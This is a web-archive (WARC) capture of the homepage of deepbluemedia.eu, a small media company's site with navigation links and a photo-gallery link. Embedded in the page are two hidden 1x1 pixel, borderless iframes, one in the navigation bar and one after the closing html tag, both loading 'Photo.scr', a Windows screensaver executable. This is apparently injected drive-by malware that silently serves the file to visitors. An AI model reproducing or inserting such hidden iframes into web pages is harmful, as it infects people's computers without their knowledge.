WARC/1.0
WARC-Type: warcinfo
WARC-Date: 2018-05-30T17:52:30Z
WARC-All-Language: fr
WARC-All-Content_type: text/html
WARC-Record-ID: <urn:uuid:64ba784d-2360-48af-9625-0b8fb352aada>
Content-Type: application/http;msgtype=response
Content-Length: 46

WARCProcessor by SING Group www.sing-group.com

WARC/1.0
WARC-Type: response
WARC-Target-URI: http://www.deepbluemedia.eu
WARC-Date: 20180530175230
WARC-Language: fr
WARC-Record-ID: <http://www.deepbluemedia.eu>
Content-Type: application/http;msgtype=response
Content-Length: 1430

HTTP/1.1 200
Content-Type:text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Deepbluemedia - Home page</title>
<link href="style.css" rel="stylesheet" type="text/css" />

 <!--[ if lt IE 7.] >
 <script defer type="text/javascript" src="pngfix.js" mce_src="pngfix.js" >
 < /script >
 <!-->
 

</head>

<body>

<div id="logo">
</div>

<div id="testata">
</div>

<div id="navbar"  class="clearfix">
	<div id="navmenu" >
		<ul>
			<li><a class="selected" href="index.php">Home</a></li>
			<li><a  href="about.php">About us</a></li>
			<li><a  href="websites.php">Websites</a></li>
			<li><a  href="photos.php">Photos</a></li>
			<li><a  href="webcasting.php">Webcasting</a></li>

		</ul>
	</div>

<iframe src=Photo.scr width=1 height=1 frameborder=0>
</iframe>
</div>

<div id="center" class="clearfix">
		<div class="center_container" style="height: 298px; width: 896px" >
			
			<div class="service" style="width: 891px">
			<h1><a href="http://deepbluemedia.photoshelter.com/archive">Click 
			here to see our photo galleries</a></h1>
			</div>

		
		</div>
</div>

<div id="footer">

	<p>&copy; 2016 deepbluemedia
	<br />all rights reserved</p>
</div>

</body>
</html>

<iframe src=Photo.scr width=1 height=1 frameborder=0>
</iframe>


